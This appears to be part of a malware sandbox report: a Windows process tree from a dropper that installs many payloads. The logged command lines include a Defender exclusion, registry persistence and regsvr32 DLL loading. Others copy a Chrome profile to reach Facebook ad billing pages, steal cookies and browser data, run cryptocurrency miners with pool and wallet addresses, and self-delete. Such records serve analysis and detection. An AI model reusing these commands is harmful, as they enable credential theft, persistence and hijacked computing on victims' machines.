PID:5868

C:\Program Files (x86)\VR\Versium Research\RunWW.exe
"C:\Program Files (x86)\VR\Versium Research\RunWW.exe"
11⤵
PID:4840

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\VR\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
12⤵
PID:6068

C:\Windows\SysWOW64\taskkill.exe
taskkill /im RunWW.exe /f
13⤵
- Kills process with taskkill
PID:6884

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
13⤵
- Delays execution with timeout.exe
PID:2192

C:\Program Files (x86)\VR\Versium Research\customer5.exe
"C:\Program Files (x86)\VR\Versium Research\customer5.exe"
11⤵
PID:5288

C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"
12⤵
PID:6436

C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exe
parse.exe -f json -b edge
13⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exe
parse.exe -f json -b chrome
13⤵
PID:5268

C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exe
parse.exe -f json -b firefox
13⤵
PID:4164

C:\Users\Admin\AppData\Local\Temp\3uzkllskpi3\c4qumcq5lht.exe
"C:\Users\Admin\AppData\Local\Temp\3uzkllskpi3\c4qumcq5lht.exe" /ustwo INSTALL
8⤵
PID:2504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 648
9⤵
- Program crash
PID:6072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 656
9⤵
- Program crash
PID:2492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 664
9⤵
- Program crash
PID:5620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 672
9⤵
- Program crash
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 880
9⤵
- Program crash
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 948
9⤵
- Program crash
PID:6288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1148
9⤵
- Program crash
PID:6428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1164
9⤵
- Program crash
PID:6552

C:\Users\Admin\AppData\Local\Temp\n15c3czcu1d\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\n15c3czcu1d\AwesomePoolU1.exe"
8⤵
PID:3356

C:\Users\Admin\AppData\Local\Temp\xmk4jatrau3\vict.exe
"C:\Users\Admin\AppData\Local\Temp\xmk4jatrau3\vict.exe" /VERYSILENT /id=535
8⤵
PID:4192

C:\Users\Admin\AppData\Local\Temp\is-EB3SM.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EB3SM.tmp\vict.tmp" /SL5="$1043A,870426,780800,C:\Users\Admin\AppData\Local\Temp\xmk4jatrau3\vict.exe" /VERYSILENT /id=535
9⤵
PID:4236

C:\Users\Admin\AppData\Local\Temp\is-25E8K.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-25E8K.tmp\win1host.exe" 535
10⤵
PID:4596

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\F52vzi9V5.dll"
11⤵
PID:6108

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\F52vzi9V5.dll"
12⤵
PID:7600

C:\Windows\system32\regsvr32.exe
/s "C:\Users\Admin\AppData\Local\Temp\F52vzi9V5.dll"
13⤵
PID:7688

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\F52vzi9V5.dllJFKHSVMsO.dll"
11⤵
PID:8156

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\F52vzi9V5.dllJFKHSVMsO.dll"
12⤵
PID:4476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 1260
11⤵
- Program crash
PID:6656

C:\Users\Admin\AppData\Local\Temp\qnbkbv5drqh\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\qnbkbv5drqh\vpn.exe" /silent /subid=482
8⤵
PID:1956

C:\Users\Admin\AppData\Local\Temp\is-J7GP9.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J7GP9.tmp\vpn.tmp" /SL5="$10452,15170975,270336,C:\Users\Admin\AppData\Local\Temp\qnbkbv5drqh\vpn.exe" /silent /subid=482
9⤵
PID:5220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:6148

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
PID:6928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
10⤵
PID:6968

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
11⤵
PID:6836

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
10⤵
PID:2400

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
10⤵
PID:4540

C:\Users\Admin\AppData\Local\Temp\xw3y4sdzbx5\bl1au2eaxip.exe
"C:\Users\Admin\AppData\Local\Temp\xw3y4sdzbx5\bl1au2eaxip.exe" /1-610
8⤵
PID:5204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Snowy-Dawn'
9⤵
PID:5364

C:\Program Files (x86)\Snowy-Dawn\7za.exe
"C:\Program Files (x86)\Snowy-Dawn\7za.exe" e -p154.61.71.51 winamp.7z
9⤵
PID:6940

C:\Program Files (x86)\Snowy-Dawn\bl1au2eaxip.exe
"C:\Program Files (x86)\Snowy-Dawn\bl1au2eaxip.exe" /1-610
9⤵
PID:1192

C:\Program Files (x86)\Snowy-Dawn\bl1au2eaxip.exe
"C:\Program Files (x86)\Snowy-Dawn\bl1au2eaxip.exe" /1-610
10⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\p0if5wdos4i\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\p0if5wdos4i\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
PID:5464

C:\Users\Admin\AppData\Local\Temp\is-624B1.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-624B1.tmp\IBInstaller_97039.tmp" /SL5="$104FE,14517664,721408,C:\Users\Admin\AppData\Local\Temp\p0if5wdos4i\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
PID:5572

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-M22R6.tmp\{app}\microsoft.cab -F:* %ProgramData%
10⤵
PID:5672

C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-M22R6.tmp\{app}\microsoft.cab -F:* C:\ProgramData
11⤵
PID:6016

C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
10⤵
PID:6080

C:\Users\Admin\AppData\Local\Temp\is-M22R6.tmp\{app}\chromium_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-M22R6.tmp\{app}\chromium_proxy.exe"
10⤵
PID:5888

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-M22R6.tmp\{app}\chromium_proxy.exe"
11⤵
PID:7144

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
12⤵
- Runs ping.exe
PID:2972

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://hostoryarticlesclub.com/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
PID:4040

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
10⤵
PID:1284

C:\Users\Admin\AppData\Local\Temp\3nzhkrpdil1\app.exe
"C:\Users\Admin\AppData\Local\Temp\3nzhkrpdil1\app.exe" /8-23
8⤵
PID:5652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Nameless-Bird'
9⤵
PID:5708

C:\Program Files (x86)\Nameless-Bird\7za.exe
"C:\Program Files (x86)\Nameless-Bird\7za.exe" e -p154.61.71.51 winamp.7z
9⤵
PID:6892

C:\Program Files (x86)\Nameless-Bird\app.exe
"C:\Program Files (x86)\Nameless-Bird\app.exe" /8-23
9⤵
PID:7072

C:\Program Files (x86)\Nameless-Bird\app.exe
"C:\Program Files (x86)\Nameless-Bird\app.exe" /8-23
10⤵
PID:8868

C:\Users\Admin\AppData\Local\Temp\yjptpa2nzuh\mlq2u1ylnup.exe
"C:\Users\Admin\AppData\Local\Temp\yjptpa2nzuh\mlq2u1ylnup.exe" /quiet SILENT=1 AF=756
8⤵
PID:5916

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\yjptpa2nzuh\mlq2u1ylnup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\yjptpa2nzuh\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616762671 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
9⤵
PID:5400

C:\Users\Admin\AppData\Local\Temp\nk2m0ybihxx\setup_10.2_us3.exe
"C:\Users\Admin\AppData\Local\Temp\nk2m0ybihxx\setup_10.2_us3.exe" /silent
8⤵
PID:8708

C:\Users\Admin\AppData\Local\Temp\LCYHUFNSWP\setups.exe
"C:\Users\Admin\AppData\Local\Temp\LCYHUFNSWP\setups.exe" ll
5⤵
- Executes dropped EXE
PID:3248

C:\Users\Admin\AppData\Local\Temp\is-OGJE0.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OGJE0.tmp\setups.tmp" /SL5="$202E6,587771,264704,C:\Users\Admin\AppData\Local\Temp\LCYHUFNSWP\setups.exe" ll
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2944

C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
4⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:424

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
5⤵
- Enumerates system info in registry
PID:4188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
5⤵
PID:4400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe13fd6e00,0x7ffe13fd6e10,0x7ffe13fd6e20
6⤵
PID:2184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2168 /prefetch:8
6⤵
PID:4524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1644 /prefetch:8
6⤵
PID:4348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:2
6⤵
PID:4084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:1
6⤵
PID:5052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2688 /prefetch:1
6⤵
PID:4464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
6⤵
PID:5240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
6⤵
PID:5212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
6⤵
PID:5196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
6⤵
PID:5500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4744 /prefetch:8
6⤵
PID:5620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4656 /prefetch:8
6⤵
PID:4284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4980 /prefetch:8
6⤵
PID:6788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1584,17641939459014134860,10740501255959160267,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4780 /prefetch:8
6⤵
PID:5940

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
4⤵
PID:5148

C:\Users\Admin\AppData\Roaming\F604.tmp.exe
"C:\Users\Admin\AppData\Roaming\F604.tmp.exe"
5⤵
PID:2232

C:\Users\Admin\AppData\Roaming\131.tmp.exe
"C:\Users\Admin\AppData\Roaming\131.tmp.exe"
5⤵
PID:6112

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
6⤵
PID:6844

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
6⤵
PID:6200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
5⤵
PID:2388

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:3168

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
4⤵
PID:3140

C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
4⤵
PID:7644

C:\ProgramData\2751205.exe
"C:\ProgramData\2751205.exe"
5⤵
PID:7756

C:\ProgramData\6262579.exe
"C:\ProgramData\6262579.exe"
5⤵
PID:7684

C:\ProgramData\465329.exe
"C:\ProgramData\465329.exe"
5⤵
PID:4108

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
4⤵
PID:6252

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:2152

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:3148

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4656

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:748

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4152

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3936

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5628

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C8CA37B1EB90581C2281E8D8E96081E4 C
2⤵
PID:6680

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 838F9176DE98DE2951ACF55F744BF2F3
2⤵
PID:4848

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
2⤵
PID:7408

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
3⤵
PID:9032

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
4⤵
PID:6640

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffe06c99ec0,0x7ffe06c99ed0,0x7ffe06c99ee0
5⤵
PID:7152

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ff66c434e60,0x7ff66c434e70,0x7ff66c434e80
6⤵
PID:672

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,3349784668210974673,15508534011422804414,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6640_1029102660" --mojo-platform-channel-handle=1736 /prefetch:8
5⤵
PID:5872

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1572,3349784668210974673,15508534011422804414,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6640_1029102660" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1652 /prefetch:2
5⤵
PID:8748

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,3349784668210974673,15508534011422804414,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6640_1029102660" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2420 /prefetch:1
5⤵
PID:6244

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,3349784668210974673,15508534011422804414,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6640_1029102660" --mojo-platform-channel-handle=2172 /prefetch:8
5⤵
PID:8516

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,3349784668210974673,15508534011422804414,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6640_1029102660" --mojo-platform-channel-handle=3156 /prefetch:8
5⤵
PID:4140

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
